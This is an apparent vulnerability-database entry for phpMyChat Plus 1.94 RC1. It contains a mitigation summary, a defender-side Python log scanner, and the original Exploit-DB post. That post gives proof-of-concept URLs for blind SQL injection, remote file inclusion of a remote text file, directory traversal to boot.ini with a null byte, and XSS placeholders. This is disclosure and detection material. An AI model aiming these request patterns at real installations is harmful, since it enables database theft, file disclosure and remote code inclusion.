Vendor: phpMyChat Plus
Author: L0n3ly-H34rT
CVSS: 8.8 (HIGH)
Vulnerability Types: Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, XSS
CWE: 89, 94, 98, 79
Product Name: phpMyChat Plus
Affected Version From: 1.94 RC1
Affected Version To: 1.94 RC1
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmychat:phpmychat_plus
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Windows
Year: 2012

phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities

phpMyChat Plus v1.94 RC1 is vulnerable to Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, and XSS. The blind SQL injection can be driven by an automated blind SQL injection tool to extract database information. The Remote File Inclusion requires allow_url_include to be set to On, and the Local File Inclusion requires magic_quotes_gpc to be set to Off. The author lists no preconditions for the XSS beyond the attacker's own ingenuity.

Mitigation:

To mitigate Remote Blind SQL Injection, Remote File Inclusion, Local File Inclusion, and XSS, the user should ensure that allow_url_include is set to Off, that magic_quotes_gpc is set to On, and that all user input is properly validated and escaped for the context in which it is used. Note that magic_quotes_gpc is deprecated and was removed in PHP 5.4, so it cannot be relied on as a control; parameterized queries, an allow-list for included paths, and HTML-encoding of output address the root causes regardless of PHP configuration.
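As an added defender-side example (not part of the advisory or of phpMyChat Plus itself), the following Python script scans web-server access logs for requests shaped like the four PoCs above: a URL in install.php's ChatPath (RFI), directory traversal or a null byte in ChatPath or L (LFI), a non-numeric LastCheck (blind SQL injection probe), and angle brackets in any parameter (XSS). The log lines are constructed samples, and the expected parameter shapes (L as a lowercase language name, LastCheck as a numeric timestamp) are assumptions drawn from the PoC URLs.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the advisory); the request
# targets mirror the PoC URLs above, with benign stand-ins for [Blind SQL]
# and [XSS]. The last line is a normal request and must produce no finding.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Oct/2012:10:01:02 +0000] "GET /plus/install/old/install.php?ChatPath=http://127.0.0.1/c.txt? HTTP/1.1" 200 512
10.0.0.5 - - [04/Oct/2012:10:01:09 +0000] "GET /plus/install/old/install.php?ChatPath=../../../../../../boot.ini%00 HTTP/1.1" 200 320
10.0.0.5 - - [04/Oct/2012:10:01:15 +0000] "GET /plus/install/old/install.php?L=../../../../../../boot.ini%00 HTTP/1.1" 200 320
10.0.0.6 - - [04/Oct/2012:10:02:15 +0000] "GET /plus/users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=1349344000%27 HTTP/1.1" 200 88
10.0.0.7 - - [04/Oct/2012:10:03:00 +0000] "GET /plus/input.php?D=20&From=remotelogin.php&L=serbian_latin&N=10&U=%3Cb%3Ehi&Ver=H HTTP/1.1" 200 410
10.0.0.8 - - [04/Oct/2012:10:04:00 +0000] "GET /plus/users_popuph.php?B=1&From=remotelogin.php&L=english&LastCheck=1349344000 HTTP/1.1" 200 88
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')
URL_SCHEME = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)  # RFI: ChatPath is a URL
TRAVERSAL = re.compile(r'\.\.[/\\]|\x00')                  # LFI: traversal or null byte
LANG_OK = re.compile(r'^[a-z_]+$')                         # assumed shape of L= (language)

def classify(target):
    """Return (tag, param) findings for one request target (path + query)."""
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs URL-decodes
    findings = []
    if parts.path.endswith('/install.php'):
        path = params.get('ChatPath', '')
        if URL_SCHEME.match(path):
            findings.append(('rfi', 'ChatPath'))
        if TRAVERSAL.search(path):
            findings.append(('lfi', 'ChatPath'))
    if 'L' in params and not LANG_OK.match(params['L']):
        findings.append(('lfi', 'L'))
    if 'LastCheck' in params and not params['LastCheck'].isdigit():
        findings.append(('sqli', 'LastCheck'))  # assumed to be a numeric timestamp
    findings += [('xss', k) for k, v in params.items() if '<' in v or '>' in v]
    return findings

def scan(log_text):
    """Return (client_ip, tag, param) for every suspicious request under /plus/."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group('target').startswith('/plus/'):
            hits += [(m.group('ip'), tag, p) for tag, p in classify(m.group('target'))]
    return hits
```

Run it against real logs by passing the file contents to scan(); each hit names the client, the vulnerability class and the parameter that triggered the rule.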

Exploit-DB raw data:

############################################
### Exploit Title: phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities
### Date: 04/10/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://sourceforge.net/projects/phpmychat/
### Software Link: http://sourceforge.net/projects/phpmychat/files/latest/download
### Version: 1.94 RC1
### Tested on: Linux/Windows 
############################################

1- Remote Blind SQL Injection :

# P.O.C :

http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=[Blind SQL]

----------------------------------------------------------------------------------------

2- Remote File Inclusion :

# P.O.C :

http://localhost/plus/install/old/install.php?ChatPath=http://127.0.0.1/c.txt?

----------------------------------------------------------------------------------------

3- Local File Inclusion :

- Based on this exploit :

http://www.exploit-db.com/exploits/17213/

# P.O.C :

http://localhost/plus/install/old/install.php?ChatPath=../../../../../../boot.ini%00

http://localhost/plus/install/old/install.php?L=../../../../../../boot.ini%00

---------------------------------------------------------------------------------------

4- XSS :

# P.O.C :

http://localhost/plus/input.php?D=20&From=remotelogin.php&L=serbian_latin&N=10&NT=1&O=1&R=Public Room 1&ST=1&T=1&U=[XSS]&Ver=H

http://localhost/plus/users_popuph.php?B=1&From=remotelogin.php&L=chinese_traditional&LastCheck=[XSS]


############################################

# Notes :

1- For Remote Blind SQL Injection ( you can use some automatic blind SQL injection tool to get database information ).

2- For Remote File Inclusion ( must be allow_url_include=On ).

3- For Local File Inclusion ( must be magic_quotes_gpc = Off )

4- For XSS ( you must have a good brain :p )

# Greetz to my friendz